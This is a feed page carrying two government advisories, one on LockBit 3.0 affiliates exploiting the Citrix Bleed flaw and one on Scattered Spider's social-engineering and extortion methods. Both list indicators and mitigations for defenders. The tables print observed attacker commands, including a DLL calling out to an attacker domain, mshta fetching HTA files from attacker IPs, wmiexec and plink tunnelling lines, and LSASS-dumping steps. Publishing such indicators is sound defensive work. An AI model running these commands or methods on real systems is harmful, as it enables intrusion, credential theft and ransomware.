RSS Alerts from National Cyber Awareness System
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances.
This CSA provides TTPs and IOCs obtained from FBI, ACSC, and voluntarily shared by Boeing. Boeing observed LockBit 3.0 affiliates exploiting CVE-2023-4966, to obtain initial access to Boeing Distribution Inc., its parts and distribution business that maintains a separate environment. Other trusted third parties have observed similar activity impacting their organization.
Historically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical infrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency services, healthcare, manufacturing, and transportation. Observed TTPs for LockBit ransomware attacks can vary significantly in observed TTPs.
Citrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements and multifactor authentication (MFA), leading to successful session hijacking of legitimate user sessions on Citrix NetScaler web application delivery control (ADC) and Gateway appliances. Through the takeover of legitimate user sessions, malicious actors acquire elevated permissions to harvest credentials, move laterally, and access data and resources.
CISA and the authoring organizations strongly encourage network administrators to apply the mitigations found in this CSA, which include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the Citrix Knowledge Center.
The authoring organizations encourage network defenders to hunt for malicious activity on their networks using the detection methods and IOCs within this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations. If no compromise is detected, organizations should immediately apply patches made publicly available.
For the associated Malware Analysis Report (MAR), see: MAR-10478915-1.v1 Citrix Bleed
Download the PDF version of this report:
For a downloadable copy of IOCs, see:
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
CVE-2023-4966 is a software vulnerability found in Citrix NetScaler ADC and NetScaler Gateway appliances with exploitation activity identified as early as August 2023. This vulnerability provides threat actors, including LockBit 3.0 ransomware affiliates, the capability to bypass MFA [T1556.006] and hijack legitimate user sessions [T1563].
After acquiring access to valid cookies, LockBit 3.0 affiliates establish an authenticated session within the NetScaler appliance without a username, password, or access to MFA tokens [T1539]. Affiliates acquire this by sending an HTTP GET request with a crafted HTTP Host header, leading to a vulnerable appliance returning system memory information [T1082]. The information obtained through this exploit contains a valid NetScaler AAA session cookie.
Citrix publicly disclosed CVE-2023-4966 on Oct. 10, 2023, within their Citrix Security Bulletin, which issued guidance, and detailed the affected products, IOCs, and recommendations. Based on widely available public exploits and evidence of active exploitation, CISA added this vulnerability to the Known Exploited Vulnerabilities (KEVs) Catalog. This critical vulnerability exploit impacts the following software versions [1]:
Due to the ease of exploitation, CISA and the authoring organizations expect to see widespread exploitation of the Citrix vulnerability in unpatched software services throughout both private and public networks.
Malware identified in this campaign is generated beginning with the execution of a PowerShell script (123.ps1
) which concatenates two base64 strings together, converts them to bytes, and writes them to the designated file path.
$y = "TVqQAAMA... |
The resulting file (adobelib.dll
) is then executed by the PowerShell script using rundll32
.
rundll32 C:UsersPublicadobelib.dll,main
The Dynamic Link Library (DLL) will not execute correctly without the 104 hex character key. Following execution, the DLL attempts to send a POST request to https://adobe-us-updatefiles[.]digital/index.php which resolves to IP addresses 172.67.129[.]176 and 104.21.1[.]180 as of November 16, 2023. Although adobelib.dll and the adobe-us-updatefiles[.]digital have the appearance of legitimacy, the file and domain have no association with legitimate Adobe software and no identified interaction with the software.
Other observed activities include the use of a variety of TTPs commonly associated with ransomware activity. For example, LockBit 3.0 affiliates have been observed using AnyDesk and Splashtop remote management and monitoring (RMM), Batch and PowerShell scripts, the execution of HTA files using the Windows native utility mshta.exe and other common software tools typically associated with ransomware incidents.
See Table 1–Table 5 for IOCs related to Lockbit 3.0 affiliate exploitation of CVE-2023-4966.
Low confidence indicators may not be related to ransomware.
Indicator |
Type |
Fidelity |
Description |
---|---|---|---|
192.229.221[.]95 |
IP |
Low |
|
123.ps1 |
PowerShell script |
High |
Creates and executes payload via script. |
193.201.9[.]224 |
IP |
High |
FTP to Russian geolocated IP from compromised system. |
62.233.50[.]25 |
IP |
High |
Russian geolocated IP from compromised system. Hxxp://62.233.50[.]25/en-us/docs.html Hxxp://62.233.50[.]25/en-us/test.html |
51.91.79[.].17 |
IP |
Med |
|
Teamviewer |
Tool (Remote Admin) |
Low |
|
70.37.82[.]20 |
IP |
Low |
IP was seen from a known compromised account reaching out to an Altera IP address. LockBit is known to leverage Altera, a remote admin tool, such as Anydesk, team viewer, etc. |
185.17.40[.]178 |
IP |
Low |
Teamviewer C2, ties back to a polish service provider, Artnet Sp. Zo.o. Polish IP address. |
Indicator |
Type |
Fidelity |
Description |
---|---|---|---|
185.229.191.41 |
Anydesk Usage |
High |
Anydesk C2. |
81.19.135[.]219 |
IP |
High |
Russian geolocated IP hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta Hxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta |
45.129.137[.]233 |
IP |
Medium |
Callouts from known compromised device beginning during the compromised window. |
185.229.191[.]41 |
Anydesk Usage |
High |
Anydesk C2. |
Plink.exe |
Command interpreter |
High |
Plink (PuTTY Link) is a command-line connection tool, similar to UNIX SSH. It is mostly used for automated operations, such as making CVS access a repository on a remote server. Plink can be used to automate SSH actions and for remote SSH tunneling on Windows. |
AnyDeskMSI.exe |
Remote admin tool |
High |
We do see that AnyDeskMSI.exe was installed as a service with “auto start” abilities for persistence. Config file from the image could be leveraged to find the ID and Connection IP, but we do not have that currently. |
SRUtility.exe |
Splashtop utility |
|
9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a |
Netscan exe |
Network scanning software |
High |
498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155 |
Indicator |
Type |
Fidelity |
Description |
---|---|---|---|
Scheduled task: MEGAMEGAcmd |
Persistence
|
High |
|
Scheduled task: UpdateAdobeTask |
Persistence |
High |
|
Mag.dll |
Persistence |
High |
Identified as running within UpdateAdobeTask |
123.ps1 |
Script |
High |
Creates |
Adobelib.dll |
Persistence |
Low |
C2 from |
Adobe-us-updatefiles[.]digital |
Tool Download |
High |
Used to download obfuscated toolsets. |
172.67.129[.]176 |
Tool Download |
High |
IP of adobe-us-updatefiles[.]digital. |
104.21.1[.]180 |
Tool Download |
High |
Adobe-us-updatefiles[.]digital. |
cmd.exe /q /c cd 1> \127.0.0.1admin$__1698617793[.]44 2>&1 |
Command |
High |
wmiexec.exe usage |
cmd.exe /q /c cd 1> \127.0.0.1admin$__1698617793[.]44 2>&1 |
Command |
High |
wmiexec.exe usage |
cmd.exe /q /c query user 1> \127.0.0.1admin$__1698617793[.]44 2>&1 |
Command |
High |
wmiexec.exe usage |
cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex |
Command |
High |
wmiexec.exe usage |
cmd.exe /q /c cd 1> \127.0.0.1admin$__1698618133[.]54 2>&1 |
Command |
High |
wmiexec.exe usage |
The authoring organizations recommended monitoring/reviewing traffic to the 81.19.135[.]*
class C network and review for MSHTA being called with HTTP arguments [2].
Indicator |
Type |
Fidelity |
Description |
Notes |
---|---|---|---|---|
81.19.135[.]219 |
IP |
High |
Russian geolocated IP used by user to request mshta with http arguments to download random named HTA file named q0X5wzzEh6P7.hta |
|
81.19.135[.]220 |
IP |
High |
Russian geolocated IP, seen outbound in logs |
IP registered to a South African Company |
81.19.135[.]226 |
IP |
High |
Russian geolocated IP, seen outbound in logs |
IP registered to a South African Company |
Type |
Indicator |
Description |
---|---|---|
Filename |
c:users |
Process hacker |
Filename |
c:users |
Process hacker |
Filename |
psexesvc.exe |
Psexec service excutable |
Filename |
c:perflogsprocesshacker.exe |
Process hacker |
Filename |
c:windowstempscreenconnect23.8.5.8707filesprocesshacker.exe |
Process hacker transferred via screenconnect |
Filename |
c:perflogslsass.dmp |
Lsass dump |
Filename |
c:users |
Mimikatz |
Filename |
c:users |
Procdump |
Filename |
c:users |
Decrypt veeam creds |
Filename |
secretsdump.py |
Impacket installed on azure vm |
Cmdline |
secretsdump.py |
Impacket installed on azure vm |
Filename |
ad.ps1 |
Adrecon found in powershell transcripts |
Filename |
c:perflogs64-bitnetscan.exe |
Softperfect netscan |
Filename |
tniwinagent.exe |
Total network inventory agent |
Filename |
psexec.exe |
Psexec used to deploy screenconnect |
Filename |
7z.exe |
Used to compress files |
Tool |
Action1 |
RMM |
Tool |
Atera |
RMM |
tool |
anydesk |
rmm |
tool |
fixme it |
rmm |
tool |
screenconnect |
rmm |
tool |
splashtop |
rmm |
tool |
zoho assist |
rmm |
ipv4 |
101.97.36[.]61 |
zoho assist |
ipv4 |
168.100.9[.]137 |
ssh portforwarding infra |
ipv4 |
185.20.209[.]127 |
zoho assist |
ipv4 |
185.230.212[.]83 |
zoho assist |
ipv4 |
206.188.197[.]22 |
powershell reverse shell seen in powershell logging |
ipv4 |
54.84.248[.]205 |
fixme ip |
Ipv4 |
141.98.9[.]137 |
Remote IP for CitrixBleed |
domain |
assist.zoho.eu |
zoho assist |
filename |
c:perflogs1.exe |
connectwise renamed |
filename |
c:perflogsrun.exe |
screenconnect pushed by psexec |
filename |
c:perflogs64-bitm.exe |
connectwise renamed |
filename |
c:perflogs64-bitm0.exe |
connectwise renamed |
filename |
c:perflogsza_access_my_department.exe |
zoho remote assist |
filename |
c:users |
zoho remote assist |
filename |
c:windowsservicehost.exe |
plink renamed |
filename |
c:windowssysconf.bat |
runs servicehost.exe (plink) command |
filename |
c:windowstempscreenconnect23.8.5.8707filesazure.msi |
zoho remote assist used to transfer data via screenconnect |
cmdline |
echo enter | c:windowsservicehost.exe -ssh -r 8085:127.0.0.1:8085 |
plink port forwarding |
domain |
eu1-dms.zoho[.]eu |
zoho assist |
domain |
fixme[.]it |
fixme it |
domain |
unattended.techinline[.]net |
fixme it |
See Table 6 and Table 7 for all referenced threat actor tactics and techniques in this advisory.
Technique Title |
ID |
Use |
---|---|---|
System Information Discovery |
Threat actors will attempt to obtain information about the operating system and hardware, including versions, and patches. |
Technique Title |
ID |
Use |
---|---|---|
Modify Authentication Process: Multifactor Authentication |
Threat actors leverage vulnerabilities found within CVE- to compromise, modify, and/or bypass multifactor authentication to hijack user sessions, harvest credentials, and move laterally, which enables persistent access. |
|
Steal Web Session Cookie |
Threat actors with access to valid cookies can establish an authenticated session within the NetScaler appliance without a username, password, or access to multifactor authentication (MFA) tokens. |
Network defenders should prioritize observing users in session when hunting for network anomalies. This will aid the hunt for suspicious activity such as installing tools on the system (e.g., putty, rClone ), new account creation, log item failure, or running commands such as hostname, quser, whoami, net, and taskkill. Rotating credentials for identities provisioned for accessing resources via a vulnerable NetScaler ADC or Gateway appliance can also aid in detection.
For IP addresses:
Note: MFA to NetScaler will not operate as intended due to the attacker bypassing authentication by providing a token/session for an already authenticated user.
The following procedures can help identify potential exploitation of CVE-2023-4966 and LockBit 3.0 activity:
tf0gYx2YI
for identifying LockBit encrypted files.C:Temp
directory for loading and the execution of files.Below, are CISA developed YARA rules and an open-source rule that may be used to detect malicious activity in the Citrix NetScaler ADC and Gateway software environment. For more information on detecting suspicious activity within NetScaler logs or additional resources, visit CISA’s Malware Analysis Report (MAR) MAR-10478915-1.v1 Citrix Bleed or the resource section of this CSA [3]:
CISA received four files for analysis that show files being used to save registry hives, dump the Local Security Authority Subsystem Service (LSASS) process memory to disk, and attempt to establish sessions via Windows Remote Management (WinRM). The files include:
rule CISA_10478915_01 : trojan installs_other_components |
This file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an argument. The output is printed to a file named 'z.txt' located in the path C:WindowsTasks. Next, a.bat pings the loop back internet protocol (IP) address 127.0.0[.]1 three times.
The next command it runs is reg save to save the HKLMSYSTEM registry hive into the C:Windowstasksem directory. Again, a.bat pings the loop back address 127.0.0[.]1 one time before executing another reg save command and saves the HKLMSAM registry hive into the C:WindowsTaskam directory. Next, a.bat runs three makecab commands to create three cabinet (.cab) files from the previously mentioned saved registry hives and one file named C:UsersPublica.png. The names of the .cab files are as follows:
|
This file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat. This file issues the remote procedure call (RPC) ncalrpc:[lsasspirpc] to the RPC end point to provide a file path to the LSASS on the infected machine. Once the file path is returned, the malware loads the accompanying DLL file called a.dll into the running LSASS process. If the DLL is correctly loaded, then the malware outputs the message "[*]success" in the console.
|
This file is a 64-bit Windows DLL called a.dll that is executed by a.bat as a parameter for the file a.exe. The file a.exe loads this file into the running LSASS process on the infected machine. The file a.dll calls the Windows API CreateFileW to create a file called a.png in the path C:UsersPublic.
Next, a.dll loads DbgCore.dll then utilizes MiniDumpWriteDump function to dump LSASS process memory to disk. If successful, the dumped process memory is written to a.png. Once this is complete, the file a.bat specifies that the file a.png is used to create the cabinet file called a.cab in the path C:WindowsTasks.
|
This file is a Python script called a.py that attempts to leverage WinRM to establish a session. The script attempts to authenticate to the remote machine using NT LAN Manager (NTLM) if the keyword "hashpasswd" is present. If the keyword "hashpasswd" is not present, then the script attempts to authenticate using basic authentication. Once a WinRM session is established with the remote machine, the script has the ability to execute command line arguments on the remote machine. If there is no command specified, then a default command of “whoami” is run.
Import "pe" |
Organizations are encouraged to assess Citrix software and your systems for evidence of compromise, and to hunt for malicious activity (see Additional Resources section).If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform all tasks associated with the web management software as well as installing malicious code.
If a potential compromise is detected, organizations should:
These mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and Gateway software. CISA and authoring organizations recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of exploitation such as threat actors leveraging unpatched vulnerabilities within Citrix NetScaler appliances, which strengthens the security posture of their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
The authoring organizations of this CSA recommend organizations implement the mitigations below to improve your cybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise associated with Citrix CVE 2023-4966 and LockBit 3.0 ransomware & ransomware affiliates. These mitigations align with the Cross-Sector Cybersecurity performance goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA and the authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with LockBit 3.0 affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center at [email protected] or (888) 282-0870.
Australian organizations that have been impacted or require assistance in regard to a ransomware incident can contact ASD’s ACSC via 1300 CYBER1 (1300 292 371), or by submitting a report to cyber.gov.au.
The information in this report is being provided “as is” for informational purposes only. CISA and authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring organizations.
Boeing contributed to this CSA.
[1] NetScaler ADC and NetScaler Gateway Security Bulletin for CVE-2023-4966
[2] What is Mshta, How Can it Be Used and How to Protect Against it (McAfee)
[3] Investigation of Session Hijacking via Citrix NetScaler ADC and Gateway Vulnerability (CVE-2023-4966)
November 21, 2023: Initial version.
The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to recent activity by Scattered Spider threat actors against the commercial facilities sectors and subsectors. This advisory provides tactics, techniques, and procedures (TTPs) obtained through FBI investigations as recently as November 2023.
Scattered Spider is a cybercriminal group that targets large companies and their contracted information technology (IT) help desks. Scattered Spider threat actors, per trusted third parties, have typically engaged in data theft for extortion and have also been known to utilize BlackCat/ALPHV ransomware alongside their usual TTPs.
The FBI and CISA encourage critical infrastructure organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of a cyberattack by Scattered Spider actors.
Download the PDF version of this report:
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 14. See the MITRE ATT&CK® Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Scattered Spider (also known as Starfraud, UNC3944, Scatter Swine, and Muddled Libra) engages in data extortion and several other criminal activities.[1] Scattered Spider threat actors are considered experts in social engineering and use multiple social engineering techniques, especially phishing, push bombing, and subscriber identity module (SIM) swap attacks, to obtain credentials, install remote access tools, and/or bypass multi-factor authentication (MFA). According to public reporting, Scattered Spider threat actors have [2],[3],[4]:
After gaining access to networks, FBI observed Scattered Spider threat actors using publicly available, legitimate remote access tunneling tools. Table 1 details a list of legitimate tools Scattered Spider, repurposed and used for their criminal activity. Note: The use of these legitimate tools alone is not indicative of criminal activity. Users should review the Scattered Spider indicators of compromise (IOCs) and TTPs discussed in this CSA to determine whether they have been compromised.
Tool |
Intended Use |
Fleetdeck.io |
Enables remote monitoring and management of systems. |
Level.io |
Enables remote monitoring and management of systems. |
Mimikatz [S0002] |
Extracts credentials from a system. |
Ngrok [S0508] |
Enables remote access to a local web server by tunneling over the internet. |
Pulseway |
Enables remote monitoring and management of systems. |
Screenconnect |
Enables remote connections to network devices for management. |
Splashtop |
Enables remote connections to network devices for management. |
Tactical.RMM |
Enables remote monitoring and management of systems. |
Tailscale |
Provides virtual private networks (VPNs) to secure network communications. |
Teamviewer |
Enables remote connections to network devices for management. |
In addition to using legitimate tools, Scattered Spider also uses malware as part of its TTPs. See Table 2 for some of the malware used by Scattered Spider.
Malware |
Use |
AveMaria (also known as WarZone [S0670]) |
Enables remote access to a victim’s systems. |
Raccoon Stealer |
Steals information including login credentials [TA0006], browser history [T1217], cookies [T1539], and other data. |
VIDAR Stealer |
Steals information including login credentials, browser history, cookies, and other data. |
Scattered Spider threat actors have historically evaded detection on target networks by using living off the land techniques and allowlisted applications to navigate victim networks, as well as frequently modifying their TTPs.
Observably, Scattered Spider threat actors have exfiltrated data [TA0010] after gaining access and threatened to release it without deploying ransomware; this includes exfiltration to multiple sites including U.S.-based data centers and MEGA[.]NZ [T1567.002].
More recently, the FBI has identified Scattered Spider threat actors now encrypting victim files after exfiltration [T1486]. After exfiltrating and/or encrypting data, Scattered Spider threat actors communicate with victims via TOR, Tox, email, or encrypted applications.
Scattered Spider intrusions often begin with broad phishing [T1566] and smishing [T1660] attempts against a target using victim-specific crafted domains, such as the domains listed in Table 3 [T1583.001].
Domains |
victimname-sso[.]com |
victimname-servicedesk[.]com |
victimname-okta[.]com |
In most instances, Scattered Spider threat actors conduct SIM swapping attacks against users that respond to the phishing/smishing attempt. The threat actors then work to identify the personally identifiable information (PII) of the most valuable users that succumbed to the phishing/smishing, obtaining answers for those users’ security questions. After identifying usernames, passwords, PII [T1589], and conducting SIM swaps, the threat actors then use social engineering techniques [T1656] to convince IT help desk personnel to reset passwords and/or MFA tokens [T1078.002],[T1199],[T1566.004] to perform account takeovers against the users in single sign-on (SSO) environments.
Scattered Spider threat actors then register their own MFA tokens [T1556.006],[T1606] after compromising a user’s account to establish persistence [TA0003]. Further, the threat actors add a federated identity provider to the victim’s SSO tenant and activate automatic account linking [T1484.002]. The threat actors are then able to sign into any account by using a matching SSO account attribute. At this stage, the Scattered Spider threat actors already control the identity provider and then can choose an arbitrary value for this account attribute. As a result, this activity allows the threat actors to perform privileged escalation [TA0004] and continue logging in even when passwords are changed [T1078]. Additionally, they leverage common endpoint detection and response (EDR) tools installed on the victim networks to take advantage of the tools’ remote-shell capabilities and executing of commands which elevates their access. They also deploy remote monitoring and management (RMM) tools [T1219] to then maintain persistence.
Once persistence is established on a target network, Scattered Spider threat actors often perform discovery, specifically searching for SharePoint sites [T1213.002], credential storage documentation [T1552.001], VMware vCenter infrastructure [T1018], backups, and instructions for setting up/logging into Virtual Private Networks (VPN) [TA0007]. The threat actors enumerate the victim’s Active Directory (AD), perform discovery and exfiltration of victim’s code repositories [T1213.003], code-signing certificates [T1552.004], and source code [T1083],[TA0010]. Threat actors activate Amazon Web Services (AWS) Systems Manager Inventory [T1538] to discover targets for lateral movement [TA0007],[TA0008], then move to both preexisting [T1021.007] and actor-created [T1578.002] Amazon Elastic Compute Cloud (EC2) instances. In instances where the ultimate goal is data exfiltration, Scattered Spider threat actors use actor-installed extract, transform, and load (ETL) tools [T1648] to bring data from multiple data sources into a centralized database [T1074],[T1530]. According to trusted third parties, where more recent incidents are concerned, Scattered Spider threat actors may have deployed BlackCat/ALPHV ransomware onto victim networks—thereby encrypting VMware Elastic Sky X integrated (ESXi) servers [T1486].
To determine if their activities have been uncovered and maintain persistence, Scattered Spider threat actors often search the victim’s Slack, Microsoft Teams, and Microsoft Exchange online for emails [T1114] or conversations regarding the threat actor’s intrusion and any security response. The threat actors frequently join incident remediation and response calls and teleconferences, likely to identify how security teams are hunting them and proactively develop new avenues of intrusion in response to victim defenses. This is sometimes achieved by creating new identities in the environment [T1136] and is often upheld with fake social media profiles [T1585.001] to backstop newly created identities.
See Tables 4 through 17 for all referenced threat actor tactics and techniques in this advisory.
Technique Title |
ID |
Use |
---|---|---|
Gather Victim Identity Information |
Scattered Spider threat actors gather usernames, passwords, and PII for targeted organizations. |
|
Phishing for Information |
Scattered Spider threat actors use phishing to obtain login credentials, gaining access to a victim’s network. |
Technique Title |
ID |
Use |
Acquire Infrastructure: Domains |
Scattered Spider threat actors create domains for use in phishing and smishing attempts against targeted organizations. |
|
Establish Accounts: Social Media Accounts |
Scattered Spider threat actors create fake social media profiles to backstop newly created user accounts in a targeted organization. |
Technique Title |
ID |
Use |
---|---|---|
Phishing |
Scattered Spider threat actors use broad phishing attempts against a target to obtain information used to gain initial access. Scattered Spider threat actors have posed as helpdesk personnel to direct employees to install commercial remote access tools. |
|
Phishing (Mobile) |
Scattered Spider threat actors send SMS messages, known as smishing, when targeting a victim. |
|
Phishing: Spearphishing Voice |
Scattered Spider threat actors use voice communications to convince IT help desk personnel to reset passwords and/or MFA tokens. |
|
Trusted Relationship |
Scattered Spider threat actors abuse trusted relationships of contracted IT help desks to gain access to targeted organizations. |
|
Valid Accounts: Domain Accounts |
Scattered Spider threat actors obtain access to valid domain accounts to gain initial access to a targeted organization. |
Technique Title |
ID |
Use |
Serverless Execution |
Scattered Spider threat actors use ETL tools to collect data in cloud environments. |
|
User Execution |
Scattered Spider threat actors impersonating helpdesk personnel direct employees to run commercial remote access tools thereby enabling access to the victim’s network. |
Technique Title |
ID |
Use |
---|---|---|
Persistence |
Scattered Spider threat actors seek to maintain persistence on a targeted organization’s network. |
|
Create Account |
Scattered Spider threat actors create new user identities in the targeted organization. |
|
Modify Authentication Process: Multi-Factor Authentication |
Scattered Spider threat actors may modify MFA tokens to gain access to a victim’s network. |
|
Valid Accounts |
Scattered Spider threat actors abuse and control valid accounts to maintain network access even when passwords are changed. |
Technique Title |
ID |
Use |
---|---|---|
Privilege Escalation |
Scattered Spider threat actors escalate account privileges when on a targeted organization’s network. |
|
Domain Policy Modification: Domain Trust Modification |
Scattered Spider threat actors add a federated identify provider to the victim’s SSO tenant and activate automatic account linking. |
Technique Title |
ID |
Use |
---|---|---|
Modify Cloud Compute Infrastructure: Create Cloud Instance |
Scattered Spider threat actors will create cloud instances for use during lateral movement and data collection. |
|
Impersonation |
Scattered Spider threat actors pose as company IT and/or helpdesk staff to gain access to victim’s networks. Scattered Spider threat actors use social engineering to convince IT help desk personnel to reset passwords and/or MFA tokens. |
Technique Title |
ID |
Use |
---|---|---|
Credential Access |
Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain login credentials. |
|
Forge Web Credentials |
Scattered Spider threat actors may forge MFA tokens to gain access to a victim’s network. |
|
Multi-Factor Authentication Request Generation |
Scattered Spider sends repeated MFA notification prompts to lead employees to accept the prompt and gain access to the target network. |
|
Unsecured Credentials: Credentials in Files |
Scattered Spider threat actors search for insecurely stored credentials on victim’s systems. |
|
Unsecured Credentials: Private Keys |
Scattered Spider threat actors search for insecurely stored private keys on victim’s systems. |
Technique Title |
ID |
Use |
Discovery |
Upon gaining access to a targeted network, Scattered Spider threat actors seek out SharePoint sites, credential storage documentation, VMware vCenter, infrastructure backups and enumerate AD to identify useful information to support further operations. |
|
Browser Information Discovery |
Scattered Spider threat actors use tools (e.g., Raccoon Stealer) to obtain browser histories. |
|
Cloud Service Dashboard |
Scattered Spider threat actors leverage AWS Systems Manager Inventory to discover targets for lateral movement. |
|
File and Directory Discovery |
Scattered Spider threat actors search a compromised network to discover files and directories for further information or exploitation. |
|
Remote System Discovery |
Scattered Spider threat actors search for infrastructure, such as remote systems, to exploit. |
|
Steal Web Session Cookie |
Scattered Spider threat actors use tools, such as Raccoon Stealer, to obtain browser cookies. |
Technique Title |
ID |
Use |
Lateral Movement |
Scattered Spider threat actors laterally move across a target network upon gaining access and establishing persistence. |
|
Remote Services: Cloud Services |
Scattered Spider threat actors use pre-existing cloud instances for lateral movement and data collection. |
Technique Title |
ID |
Use |
Data from Information Repositories: Code Repositories |
Scattered Spider threat actors search code repositories for data collection and exfiltration. |
|
Data from Information Repositories: Sharepoint |
Scattered Spider threat actors search SharePoint repositories for information. |
|
Data Staged |
Scattered Spider threat actors stage data from multiple data sources into a centralized database before exfiltration. |
|
Email Collection |
Scattered Spider threat actors search victim’s emails to determine if the victim has detected the intrusion and initiated any security response. |
|
Data from Cloud Storage |
Scattered Spider threat actors search data in cloud storage for collection and exfiltration. |
Technique Title |
ID |
Use |
---|---|---|
Remote Access Software |
Impersonating helpdesk personnel, Scattered Spider threat actors direct employees to run commercial remote access tools thereby enabling access to and command and control of the victim’s network. Scattered Spider threat actors leverage third-party software to facilitate lateral movement and maintain persistence on a target organization’s network. |
Technique Title |
ID |
Use |
---|---|---|
Exfiltration |
Scattered Spider threat actors exfiltrate data from a target network to for data extortion. |
Technique Title |
ID |
Use |
---|---|---|
Data Encrypted for Impact |
Scattered Spider threat actors recently began encrypting data on a target network and demanding a ransom for decryption. Scattered Spider threat actors has been observed encrypting VMware ESXi servers. |
|
Exfiltration Over Web Service: Exfiltration to Cloud Storage |
Scattered Spider threat actors exfiltrate data to multiple sites including U.S.-based data centers and MEGA[.]NZ. |
|
Financial Theft |
Scattered Spider threat actors monetized access to victim networks in numerous ways including extortion-enabled ransomware and data theft. |
These mitigations apply to all critical infrastructure organizations and network defenders. The FBI and CISA recommend that software manufactures incorporate secure-by-design and -default principles and tactics into their software development practices limiting the impact of ransomware techniques, thus, strengthening the secure posture for their customers.
For more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.
The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on the threat actor activity and to reduce the risk of compromise by Scattered Spider threat actors. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:
In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
